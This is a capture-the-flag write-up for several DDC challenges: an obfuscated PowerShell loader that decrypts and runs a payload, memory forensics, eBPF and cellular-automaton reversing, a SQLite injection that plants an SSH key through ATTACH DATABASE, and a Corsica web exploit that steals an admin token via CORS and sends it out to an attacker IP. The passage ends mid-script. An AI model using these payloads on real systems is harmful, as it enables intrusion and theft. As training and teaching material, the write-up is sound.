$cue = 'xTIqOTG/xXlvBeM42zLULcj6Qn2SyPScIMbTXUXYm9HlteBxjN4VGBk3zOb1CJ1NJVFqPmsGTdd/0Rmv/c3mqnYLqmuMbQxkNDCpi3iHH/fPcFz/cgmxYaB9WU7PAxZEU1Firj7FvNH5u3Jk5+SvDBN1GTkVZNw1/8De6++2WnyLpxAREcO3I1P4hVBDMyNqqfrH+KuuXEQeKw0PpN/6XX7Rh/X1kmNZkK624UgV6dNzRC0Eno1rvsP7MParpS8AAcvypX8dWlKSpTKXzl6iiOhfiSHBqhZmTO0hlSLQzId9mmdL+4iR3lJQurS5cxlzb9MJrDL+V3Y8GGwl0yxsnTBRbpG99DG0TRMxBEg4wNweYP+xyDIRO4fJg78ApVIem5pOpg4N3CUZv/AiurOSsxzHhIRoUFwHuZmmg2xeCjODaZEruxzH0+7FNOxSELieJi8dtms8'
function scream([int]$i) {
jockey($i+37506)
cactus($i+25237)
conscience($i+39467)
rite($i+22880)
filth($i+36123)
prove($i+31260)
gaudy($i+53677)
jog($i+14548)
veldt($i+18624)
effectiveness($i+4327)
oil($i+46879)
}
function medal([int]$i) {
relieved($i+42996)
guest($i+38890)
rider($i+8380)
date($i+12867)
oil($i+29260)
comma($i+51927)
blackberry($i+19893)
urn($i+48257)
validity($i+24155)
transom($i+35454)
bike($i+18704)
intervenor($i+22571)
bail($i+34061)
nectar($i+41359)
cathedral($i+53732)
mule($i+7269)
field($i+31089)
cling($i+43634)
streetcar($i+33257)
}
$criminal = '3meYpkmXcslAd16177iQmSS97UXP69yzAbFFFe/Vx1J+qAEIujuMGZBBRsnhu78JRaQu2OMKhdmM7xuh3/zILBf0MmN6DtHFaX6j4Zpn4DSczADjrid2h1AATGw/ggOj'
$breakable = 'H0FVl/SN2tPh6BBmIkJAfza/uTTnVTNYZeiGC9ecnvw7LpbrXj32N2seemFs46Gu2lR+x3HDzHD2ZIBSTYuZvxn+RdRermpHrAww4O9q8KqNNfOdh2D6uq53juCLhhNAmSAzqBaLHsnFGznkOzK21O/ykSVtYIIKCoxooaRTJ+iunPf7cfli3VED0DgCdDR1ylUnM8w3nQgZdzDxMgD5yk+wugjsNxOJ41e8j8qAX/uUxwnsCarDfWxx5GJWWP4R+hTFDZJU86OZPJ/Uu6qHhwimpBCMyMq98tcqZ9oemw=='
$spiffy = '9ohqylF5evGV4xxxA0Iz6Y4gsr88frcuBkJK6H4NpChsuWMZvyY1fAIIJMD6ndkj1x8cGoDSO3WfoSVlatsOmQ9I1rnIKjj4k2Y8PJ+WDHYtLdGubZwa12NYc7YlgnAhjIdAZl8wzMGaBSrEb9UVlb43ARdPPIG2MDuxCFEeyU2AYPQ7M6i1givHhB4idyj6Iy5/7M9aklzBFQPX49g/rCrR+SdosBb7y/jjOF8OFx4Tp27V1DdpDHxW3cx37QxEu9HSlOthLky4APKU+OmDbNVZGfj+P19BaKCMrBhzrPJWwaN7+HKorhnyJVundMFmG3Xa29jlgNPdJO2BkWuVO6RXJqAwKVprA1BshvdCJ9NqpXv9bw7Y7UZO/g2+8PxPdCKb74pfCt3BQ6YOcTXsqrhLvJ4W+YvGEAgmhto9Nh/X'
$dam = '5WcJXT5XwlTwAB9Aaw3F3HEhV4MY+QEyaqgUHyAF+KdevMTislQHy7SinCOqyj/v4cQcw/X9DYHxN50qxXxi4vMFI3jVih3bBFeqdMY6oQs8fBZQ1wJDbMVxNu6Zi+x/7HDQ0YkDs62qDLLqyEH+8E+iPdrM5fZmq7dphAMVy6QHxm4xNiCgPqcIlLpxKprH6Qyp2B+9WKxe0FUtIR4XHnjLAADoy3hzBTekbqTVIrH2ie9OfMHEcBtpbMDZm0eT+5hyhJ3WJ8v7SfwJjBpng+JiV/ONiVD3hGqWlBasxBA='
$kendo = 23405
$execution = 'knjaDutpAeiOXRfV7VGRjEVkMei5CkA9ru4+jXAEWmqo3nARX7/KZDQnxeFUBkozHxMW2QrfxF7rU+OIGBmw8m5Stz1gvMA5vltWs47DNwWdydfDMyuy84bB7H+3wF/o+Bmlqw4a9DBAbYVVdP09B/my8AHD78SprEwbbOM4BpQ5JiY8LSoh7ZG0VpOsPxQ03M4IH5QD7ts6n9o6V2k0BriJvz+5Itmc5zUKymwYb2kwi4h8FvRVyTXRU1PdE5MMaIYcZEYA1GkOqRXfSErX7BwLk48D9+FtXvDoplI8ECKSmdadMQQ9IXPChbe2YfoVOxgy5BL++XszYO/XgxYc8P9Mojz+cPn9a3e7bZgiuxmH0oZGlQl0kjf9AFZ2SXAISoK5A2mbOXa94PdPqoldFr0zQ9W2Jy2apU0Zo2i1pgPmz+GaGp1YONuvjqqwwCkzHRjChienspF+V08jiUd1YNMp'
$checkbook = 'mht3s29j0wxgB8Ry7'
$oil = 'sJyoPvj4kXYXoMhkngQBXvyLzuaZ5nyYz0dGjrf/rBS5sK5f2cehoQgZsAh8Pbxz5fCzj2PJWLUsmQC+NPDPGPYTqwMEdCykTZAgzJrcdUHX7te1TWQYUwvOOkKZp/yXnLEY2hdTzPMAjj53NL/bTkHXeev7Ovax8seky7otl24um4KP/31Q3wMrLTidKTgaRp+GV0HiO/rBNXyFfp7ycrtr0pbHMRr+CjYOkKZODWJxSb/p9RSj4SzllJ4='
function people([int]$i) {
faucet($i+15799)
building($i+40775)
eclipse($i+48058)
murder($i+43573)
}
function sword([int]$i) {
soap($i+31195)
temple($i+17211)
ring($i+38823)
iris($i+19017)
wheat($i+31513)
target($i+6127)
cycle($i+33408)
theory($i+24266)
clasp($i+36494)
excess($i+43498)
suffer($i+38248)
casserole($i+910)
assess($i+26116)
row($i+27653)
sub($i+8125)
blossom($i+45967)
}
$everybody = 'sswWZQ882e5'
function linkage([int]$i) {
ram($i+26216)
succinct($i+55963)
innate($i+16309)
}
$batting = 'wPIjxVmOAYoT9AaZTbfqcq9JsAxpVT4HbiEmCYgFtDE='
$colloquy = 55183
$lawsuit = '7Ab'
$feng = $osmosis
if ($osmosis -eq "") {
$feng = Read-Host -Prompt 'Variable name'
}
$pig = Get-Variable -Name $feng -ValueOnly
$pavement = $quiche
if ($quiche -eq "") {
$pavement = Read-Host -Prompt 'Key Variable name'
}
$nymph = Get-Variable -Name $pavement -ValueOnly
$reciprocity = [System.Convert]::FromBase64String($pig)
$diagram = [System.Convert]::FromBase64String($nymph)
$snowmobiling = @{TypeName="SYS"+"tem.s"+"e"+"cU"+"R"+"ItY"+".Cr"+"ypT"+"ogra"+"pHY"+".Ae"+"SMA"+"NA"+"ge"+"d";Property=@{("mOdE")=[System.Security.Cryptography.CipherMode]::CBC; Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; BlockSize=128;KeySize=256;("iv")=$reciprocity[0..15];}}
$inspiration = New-Object @snowmobiling
$inspiration.("key")=$diagram
[System.Text.Encoding]::UTF8.GetString($inspiration.("C"+"rEA"+"Te"+"decRY"+"PtOR")().TransformFinalBlock($reciprocity,16,$reciprocity.length-16)).Trim([char]0)|&((&g''"cm" ("?"+"?"+'x'))[1])
|
From the previous script we got -ArgumentList @("criminal", "batting"), so if we assume that $criminal is our ciphertext and $batting is our key, we can decrypt it by running the script.
|
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
cipher_b64 = "3meYpkmXcslAd16177iQmSS97UXP69yzAbFFFe/Vx1J+qAEIujuMGZBBRsnhu78JRaQu2OMKhdmM7xuh3/zILBf0MmN6DtHFaX6j4Zpn4DSczADjrid2h1AATGw/ggOj"
key_b64 = "wPIjxVmOAYoT9AaZTbfqcq9JsAxpVT4HbiEmCYgFtDE="
cipherdata = base64.b64decode(cipher_b64)
key = base64.b64decode(key_b64)
iv = cipherdata[:16]  # the first 16 bytes are the IV, as in the PowerShell
encrypted = cipherdata[16:]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(encrypted), AES.block_size)  # strip the PKCS7 padding
print(plaintext.rstrip(b"\x00").decode())  # mirrors .Trim([char]0)
|
After running this script, we get the following output: $secret = "DDC{l1v1ng_0ff_th3_l4nd_1s_th3_b3st_f34l1ng_dc9ed4584956}"
Flag: DDC{l1v1ng_0ff_th3_l4nd_1s_th3_b3st_f34l1ng_dc9ed4584956}
Peaceful (Forensics)
I had this amazingly peaceful dream, but my memory of it is a bit off. My dream was based on events on the 14th of December. Can you help me find out what happened in my dream?
Password to the zip: QKej9r6KGAl1
Attached file: forensics_peaceful.7z
Solution: I think I solved this challenge somewhat by accident, since I was just grepping for base64 strings in the .mem file.
|
grep -aEo '[A-Za-z0-9+/]{40,}={0,2}' flag.mem
...
/Userland/Libraries/LibGUI/TreeViewModel
/Userland/Libraries/LibGUI/TreeViewModel
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Libraries/LibGUI/VimEditingEngine
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Applications/FileManager/PropertiesWindow
/Userland/Libraries/LibGfx/ImageFormats/ImageDecoder
/Userland/Applications/FileManager/PropertiesWindow
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
ZN4Core6System6pledgeEN2AK10StringViewES2
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
/Userland/Libraries/LibShell/ImmediateFunctions
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA
ZN4Core6System6pledgeEN2AK10StringViewES2
|
It is a bit odd that the string H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA shows up so many times, and after running it through a base64 decoder we get a gzip file containing a text file, and in that text file is the flag: DDC{w000000w_d1d_y0u_4ctually_us3_v0l4t1l1ty} -> CyberChef Recipe
Flag: DDC{w000000w_d1d_y0u_4ctually_us3_v0l4t1l1ty}
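The grep above finds every long base64-looking run, including file paths and mangled C++ symbols, and it takes a human to notice that H4sI is the base64 encoding of the gzip magic 1f 8b. As an added example (not part of the writeup), the Python below automates that step: it scans a blob with the same character class, keeps only runs that decode to a valid gzip member, and returns the decompressed payloads. PAGE_BLOB_B64 is the string from the grep output above; SAMPLE_DUMP is a constructed stand-in for flag.mem built from that string and a few of the SerenityOS strings the grep also hit.

```python
import base64
import binascii
import gzip
import re
import zlib

# The string that kept showing up in the grep output above (copied from the writeup).
PAGE_BLOB_B64 = b"H4sIABDzQ2kA/x3A0QmAUAgF0JWU3OC9PS6Rn/cvTSTaXejsvd6SX8HV0ZKwK/IkG3kfeIQWSo3+BuBQfyotAAAA"

# Same character class as the grep command: 40+ base64 characters, optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"

# Constructed stand-in for flag.mem: a few of the SerenityOS symbol/path strings the
# grep also hit, the blob above twice, and some binary filler between them.
SAMPLE_DUMP = (
    b"\x00\x00/Userland/Libraries/LibGUI/VimEditingEngine\x00"
    + b"ZN4Core6System6pledgeEN2AK10StringViewES2\x00" + b"\x00" * 7
    + PAGE_BLOB_B64 + b"\x00\x01\x02"
    + b"/Userland/Applications/FileManager/PropertiesWindow\x00"
    + PAGE_BLOB_B64 + b"\n"
)

def decode_if_gzip(candidate: bytes):
    """Return the decompressed payload if candidate is base64 of a gzip member, else None."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None          # not valid base64 (paths with '/' and odd lengths land here)
    if not raw.startswith(GZIP_MAGIC):
        return None          # valid base64, but not gzip ('H4sI' is the encoded magic)
    try:
        return gzip.decompress(raw)   # also verifies the CRC32/ISIZE trailer
    except (OSError, EOFError, zlib.error):
        return None          # truncated or corrupt member

def carve_gzip_strings(data: bytes) -> dict:
    """Scan a memory image (or any blob) for base64 runs that decode to gzip members.
    Returns {base64_run: decompressed_bytes}, deduplicated the way 'sort -u' would."""
    found = {}
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        if run in found:
            continue
        payload = decode_if_gzip(run)
        if payload is not None:
            found[run] = payload
    return found

if __name__ == "__main__":
    for run, payload in carve_gzip_strings(SAMPLE_DUMP).items():
        print(run[:24].decode(), "...", payload)
```

On a real image you would pass the whole file's bytes to carve_gzip_strings; the regex is the only part that touches the full dump, so memory use stays at one copy of the image.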
Windows Forensics Hell (Forensics)
Full writeup available here: Windows Forensics Hell : Writeup
Reactor (Reverse Engineering)
The reactor has gone into lockdown mode. Please help us access it!
Attached file: rev_reactor.zip
Solution: We get a stripped ELF. strace reveals that the binary loads eBPF programs and then spins in a clock_nanosleep loop, so the flag-checking logic is not in userspace at all but lives inside a BPF program.
The binary contains an embedded BPF ELF object, which I extracted by searching for the ELF magic bytes (\x7fELF) after position 4:
|
python3 -c "
data = open('reactor','rb').read()
idx = data.index(b'\x7fELF', 4)
open('bpf_clean.o','wb').write(data[idx:idx+0xb000])
"
llvm-objdump -d bpf_clean.o > bpf_disasm.txt
|
The architecture is a custom stack-based VM on top of Linux eBPF. Each clock_nanosleep syscall is a "VM tick": one BPF handler advances the program counter and loads the next instruction into a PENDING_OPS map, another dispatches to the right opcode handler via tail calls. The VM bytecode sits in a BPF map of 308 u16 words, and the 23 encoded target bytes sit in mem[253:276].
The per-character transformation is:
$$\text{encoded}[b] = \bigl((\text{char} + 48) \mathbin{\&} 255\bigr) \oplus \bigl(((b \times 8) - 48) \mathbin{\&} 255\bigr)$$
Inverted:
$$\text{char} = \Bigl(\text{encoded}[b] \oplus \bigl(((b \times 8) - 48) \mathbin{\&} 255\bigr)\Bigr) - 48$$
|
encoded = [
0xa4, 0xac, 0x93, 0x43, 0x69, 0x7c, 0x8f, 0xaa,
0xb5, 0x86, 0x8a, 0xa7, 0x51, 0xa6, 0xcf, 0xdc,
0xc1, 0xd7, 0xf3, 0x08, 0xd2, 0x1b, 0x2d
]
flag = ""
for b in range(23):
key = ((b * 8) - 48) & 0xff
flag += chr((encoded[b] ^ key) - 48)
print(flag) # DDC{iT_runz_1n_da_c0r3}
|
Flag: DDC{iT_runz_1n_da_c0r3}
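The solve script above only runs the inverse formula. As an added check (not part of the writeup), the Python below implements both the forward transformation and its inverse with the page's symbols and constants, so the stated encode formula can be verified against the extracted bytes and the two can be confirmed to be inverses for any byte input. The ENCODED constant is the 23-byte table from the page.

```python
# The 23 encoded target bytes from mem[253:276], as listed in the writeup.
ENCODED = bytes([
    0xa4, 0xac, 0x93, 0x43, 0x69, 0x7c, 0x8f, 0xaa,
    0xb5, 0x86, 0x8a, 0xa7, 0x51, 0xa6, 0xcf, 0xdc,
    0xc1, 0xd7, 0xf3, 0x08, 0xd2, 0x1b, 0x2d,
])

def key_byte(b: int) -> int:
    # ((b * 8) - 48) & 255: the XOR mask depends only on the position b.
    return ((b * 8) - 48) & 0xFF

def encode(plain: str) -> bytes:
    # encoded[b] = ((char + 48) & 255) ^ key(b)
    return bytes((((ord(c) + 48) & 0xFF) ^ key_byte(b)) for b, c in enumerate(plain))

def decode(enc: bytes) -> str:
    # char = (encoded[b] ^ key(b)) - 48. The '& 255' on the plaintext side is a no-op
    # for ASCII (126 + 48 < 256), which is why a plain subtraction inverts it; the mask
    # here keeps the round trip exact for arbitrary byte values as well.
    return "".join(chr(((v ^ key_byte(b)) - 48) & 0xFF) for b, v in enumerate(enc))

if __name__ == "__main__":
    flag = decode(ENCODED)
    print(flag)
    print(encode(flag) == ENCODED)
```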
Mitosis (Reverse Engineering)
A program that evolves?
Attached file: rev_mitosis.zip
Solution: We get a stripped 64-bit ELF. The binary reads a line from stdin, runs a transformation on the input and compares the result with a hardcoded target in .rodata via memcmp. My first instinct was to NOP out the jne after memcmp and brute-force my way to the flag, but that did not work, since the transformation is not reversible that way.
The transformation turns out to be a cellular automaton that runs 20 generations on the input buffer, hence the challenge name and the enormous size of the .text section (~38,000 lines of disassembly in Binary Ninja). Each generation reads bits from neighbouring bytes and flips bits based on compile-time constants.
The target bytes sit at file offset 0x1d018 (50 bytes). The key trick is that the CA is deterministic: if you give the binary the target as input, it transforms it, and the result at memcmp is exactly the flag. I used GDB to set a breakpoint on memcmp and read rdi:
|
import subprocess
import struct
import os
import sys
BINARY = os.path.join(os.path.dirname(__file__), 'mitosis')
# 50-byte target from .rodata -> offset 0x1d018
TARGET = bytes.fromhex(
'541113dbfc36253ecf4c4e3038d8cd25'
'3230d7eb26383efdce21321fcbdf6530'
'37c9d6601a39f0e323351d74cb693033'
'abfd'
)
GDB_SCRIPT = r"""
import gdb
class MemcmpBP(gdb.Breakpoint):
def stop(self):
rdi = int(gdb.parse_and_eval("$rdi"))
rdx = int(gdb.parse_and_eval("$rdx"))
buf = bytes(gdb.selected_inferior().read_memory(rdi, rdx))
with open('/tmp/_mitosis_flag.bin', 'wb') as f:
f.write(buf)
return False
gdb.execute("set disable-randomization on")
gdb.execute("set debuginfod enabled off")
MemcmpBP("memcmp@plt")
gdb.execute("run < /tmp/_mitosis_input.bin")
gdb.execute("quit")
"""
def main():
with open('/tmp/_mitosis_input.bin', 'wb') as f:
f.write(TARGET + b'\n')
with open('/tmp/_mitosis_hook.py', 'w') as f:
f.write(GDB_SCRIPT)
subprocess.run(
['gdb', '-q', '-batch', '-x', '/tmp/_mitosis_hook.py', BINARY],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
with open('/tmp/_mitosis_flag.bin', 'rb') as f:
flag = f.read()
print(f"Flag: {flag.decode()}")
if __name__ == '__main__':
main()
|
After running this script, we get the flag:
|
$ python3 solve.py
Flag: DDC{travel_through_c3llul4r_aut0mata_space_time!!}
|
Flag: DDC{travel_through_c3llul4r_aut0mata_space_time!!}
Squeaky Clean 1 (Boot 2 Root)
I made this challenge. It ain't much, but it's honest work. Fewer features, fewer unintendeds!
That’s what I call a clean challenge!
Solution: The site is a simple admin login page. After trying a few simple SQLi payloads I quickly found out that the database is SQLite and that it has a users table with one user:
|
sqlmap -u "http://squeaky-clean.cfire/" --method POST --data "username=admin&password=a" --batch --risk=3 --level=5 -T users --dump
Database: <current>
Table: users
[1 entry]
+----+---------------------------------------+----------+
| id | password | username |
+----+---------------------------------------+----------+
| 1 | PasswordIsNotRelevantForThisChallenge | admin |
+----+---------------------------------------+----------+
|
The password is, as stated, not relevant. The login form can be bypassed with admin'-- as the username, because the backend builds the SQL query with direct string interpolation and runs it with executescript(), a function that allows several semicolon-separated statements at once.
The dashboard reads files from disk via ?file= without any sanitisation, which means we can traverse freely with ../. I checked who runs the app and found the .ssh directory:

An authorized_keys file with an SSH public key already exists, but authorized_keys2 does not. OpenSSH checks both files by default.
Since executescript() allows multiple SQL statements, we can use ATTACH DATABASE to make SQLite create a new database file at an arbitrary path. The solution is to put our own SSH public key into /home/user/.ssh/authorized_keys2. SSH's authorized_keys parser reads the file line by line and ignores lines it does not understand, including SQLite's binary header, so we only need to make sure our public key ends up on a clean line.
I generated a key pair and sent the payload:
|
import urllib.parse, urllib.request
pubkey = open('/tmp/b2rkey1.pub').read().strip()
payload = (
f"admin'; ATTACH DATABASE '/home/user/.ssh/authorized_keys2' AS ssh2; "
f"CREATE TABLE IF NOT EXISTS ssh2.a (b TEXT); "
f"INSERT INTO ssh2.a VALUES (char(10)||char(10)||'{pubkey}'||char(10)||char(10));--"
)
data = urllib.parse.urlencode({'username': payload, 'password': 'x'}).encode()
req = urllib.request.Request('http://squeaky-clean.cfire/', data=data)
urllib.request.urlopen(req, timeout=10)
# Response: "SQL Error: near "AND": syntax error" ← expected, the writes are already committed
|
The server responds with a SQL error, but that is expected: executescript has already committed our statements. I verified via the LFI that the file actually exists (you get a UTF-8 decode error instead of "file not found", because SQLite's binary header is not UTF-8).
Then I SSH'ed in:
|
ssh -i /tmp/b2rkey1 user@squeaky-clean.cfire
|
In the home directory there was a SUID binary owned by root:
|
user@f3b7e07b69c8:~$ ls -la
-rwSr-Sr-x 1 root root 793560 Feb 25 20:27 flag.bin
user@f3b7e07b69c8:~$ /home/user/flag.bin
DDC{Sql1te_To_Auth0riz3d?!}
|
Flag: DDC{Sql1te_To_Auth0riz3d?!}
Corsica (Web Exploitation)
Tired of snow? Bored of grey skies and cold rain? Then visit Corsica!
Solution: A Flask/Gunicorn web app. The challenge is about chaining three bugs to steal a flag from the admin panel via an admin bot. I tried the classics, SQLi, SSTI, stored XSS, path traversal, nothing. The interesting part is the /tips page, which has a form for submitting URLs to the admin bot, with an HTML comment revealing that the server prepends https://localhost/ to our input.
Bug 1, Open Redirect: GET /cookie_check?next=<url> redirects to next without validation if the cookie cookie_consent=yes is set. The admin bot has that cookie, so you can send it wherever you want:
|
/cookie_check?next=https://10.0.240.248:9443/exploit.html
|
Bug 2, CORS misconfiguration: The server reflects the Origin header directly into Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true, on all endpoints, including /admin. That means JavaScript from any origin can make credentialed fetch() calls to https://localhost and read the response.
Bug 3, One-time admin token: /admin shows a token that is valid for 5 seconds. A POST to /retrieve_flag with that token returns the flag.
The admin bot accesses the app as localhost internally, so the session cookies are set for localhost, not corsica.cfire. I set up an HTTPS server with a self-signed cert (HeadlessChrome ignores that) and served an exploit page that:
- fetches https://localhost/admin with credentials: "include"; CORS allows it and the admin cookies are sent along
- parses the token out of the HTML with a regex
- POSTs to https://localhost/retrieve_flag with the token within 5 seconds
- exfiltrates the flag HTML via the open redirect to our HTTP server (window.location uses the redirect as a tunnel; a direct fetch to HTTP would be blocked as mixed content)
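Bugs 1 and 2 are both missing-validation bugs on the server side, and each has a short, well-known fix. As an added example (not part of the challenge's code), the Python below shows the reflecting CORS handler beside an allowlisted one, and a next-parameter guard that keeps the redirect on the application's own host. The allowlist and the app host name are assumptions for this example; the bypass shapes it rejects are the ones from this writeup (an absolute https:// URL to an external host) plus the protocol-relative and backslash variants that usually accompany them.

```python
from urllib.parse import urljoin, urlparse

# Assumed allowlist for this example: only the app's own origin may read responses cross-origin.
ALLOWED_ORIGINS = {"https://corsica.cfire"}

def cors_headers_reflecting(origin: str) -> dict:
    """The misconfiguration described as bug 2: whatever Origin arrives is echoed back
    together with Allow-Credentials, so any site can make credentialed reads."""
    if not origin:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}

def cors_headers_allowlisted(origin: str) -> dict:
    """Fix: only an exact allowlist match gets credentialed CORS; everything else gets no
    CORS headers at all. Vary: Origin keeps caches from serving one origin's answer to another."""
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}

def safe_next(next_param: str, app_host: str = "corsica.cfire") -> str:
    """Open-redirect guard for bug 1: accept only a same-site path, otherwise fall back to '/'.
    Rejects absolute URLs, protocol-relative '//host' and backslash forms that browsers
    normalise into a host."""
    if not next_param:
        return "/"
    candidate = next_param.strip().replace("\\", "/")
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        return "/"                      # https://..., javascript:..., //host/...
    if not candidate.startswith("/") or candidate.startswith("//"):
        return "/"
    # Re-resolve against the app's own origin and confirm the host did not change.
    resolved = urlparse(urljoin(f"https://{app_host}/", candidate))
    if resolved.netloc != app_host:
        return "/"
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")

if __name__ == "__main__":
    for origin in ("https://corsica.cfire", "https://attacker.example"):
        print(origin, cors_headers_reflecting(origin), cors_headers_allowlisted(origin))
    for nxt in ("/dashboard", "https://10.0.240.248:9443/exploit.html", "//10.0.240.248/x"):
        print(repr(nxt), "->", safe_next(nxt))
```

With the allowlisted handler the exploit page's credentialed fetch() of /admin gets no Access-Control-Allow-Origin at all and the browser withholds the response; with safe_next the /cookie_check step that delivered the page and tunnelled the flag out never leaves the site.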
|
const adminHtml = await fetch("https://localhost/admin", { credentials: "include" }).then(r => r.text());
const token = adminHtml.match(/name="token"\s+value="([^"]+)"/)[1];
const flagHtml = await fetch("https://localhost/retrieve_flag", {
method: "POST", credentials: "include",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: "token=" + encodeURIComponent(token)
}).then(r => r.text());
const b64 = btoa(unescape(encodeURIComponent(flagHtml)));
window.location = "https://localhost/cookie_check?next=http://10.0.240.248:9999/flag?d=" + encodeURIComponent(b64);
|
Triggered by sending the bot to /cookie_check?next=https://10.0.240.248:9443/exploit.html. The open redirect is thus used twice: first to deliver the exploit, then as the exfiltration tunnel.
|
import requests, urllib3, time, re, html, os, base64, json, subprocess, ssl
import http.server, threading
from urllib.parse import urlparse, parse_qs, unquote, quote
urllib3.disable_warnings()
TARGET = "https://corsica.cfire"
OUR_IP = "10.0.240.248"
HTTP_PORT = 9999
HTTPS_PORT = 9443
OUR_UUID = "c103c4dd71d14d548b26b06a89bddd6d" # make an account
SESSION = "eyJ1c2VybmFtZSI6InRlc3R1c2VyMTIzIn0.aaio0A.bpirzQCXbooQ0WWHEb4_RMt7ht0" # make an account
EXPLOIT_HTML = open("exploit.html", "rb").read()
received = []
class Handler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
parsed = urlparse(self.path)
params = parse_qs(parsed.query)
info = {
"path": self.path, "from": str(self.client_address),
"ua": self.headers.get("User-Agent",""),
"cookie": self.headers.get("Cookie",""),
}
received.append(info)
if parsed.path == "/flag":
if "d" in params:
try:
decoded = base64.b64decode(params["d"][0] + "==").decode("utf-8", errors="replace")
print(f"\n{'!'*50}\ngoldklumpen:\n{'!'*50}")
flags = re.findall(r'DDC\{[^}]+\}', decoded, re.I)
if flags:
print(f"FLAG: {flags}")
with open("/tmp/flag_data2.html", "w") as f:
f.write(decoded)
except Exception as e:
print(f"Decode error: {e}, raw: {params['d'][0][:200]}")
self.send_response(200); self.end_headers(); self.wfile.write(b"ok"); return
if parsed.path == "/error":
err = unquote(params.get("e", [""])[0])
self.send_response(200); self.end_headers(); self.wfile.write(b"ok"); return
if parsed.path == "/exploit.html":
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(EXPLOIT_HTML)))
self.end_headers()
self.wfile.write(EXPLOIT_HTML); return
self.send_response(200); self.end_headers(); self.wfile.write(b"ok")
def log_message(self, *a): pass
os.system(
"openssl req -x509 -newkey rsa:2048 -keyout /tmp/ctf_key.pem -out /tmp/ctf_cert.pem "
"-days 1 -nodes -subj '/CN=10.0.240.248' "
"-addext 'subjectAltName=IP:10.0.240.248' 2>/dev/null"
)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("/tmp/ctf_cert.pem", "/tmp/ctf_key.pem")
https_server = http.server.HTTPServer(("0.0.0.0", HTTPS_PORT), Handler)
https_server.socket = ctx.wrap_socket(https_server.socket, server_side=True)
t_https = threading.Thread(target=https_server.serve_forever, daemon=True)
t_https.start()
s = requests.Session()
s.verify = False
s.cookies.set("session", SESSION)
s.cookies.set("cookie_consent", "yes")
os.remove("/tmp/flag_data.html") if os.path.exists("/tmp/flag_data.html") else None
s.post(f"{TARGET}/profile/{OUR_UUID}", data={"bio": "WAITING_FOR_HTTPS_EXPLOIT"})
exploit_url = f"https://{OUR_IP}:{HTTPS_PORT}/exploit.html"
redirect_path = f"/cookie_check?next={exploit_url}"
ok = s.post(f"{TARGET}/request_admin",
data={"target_url": redirect_path, "desc": "check this"},
timeout=10)
for i in range(15):
time.sleep(1)
for r in received:
print(r)
r2 = s.get(f"{TARGET}/profile/{OUR_UUID}")
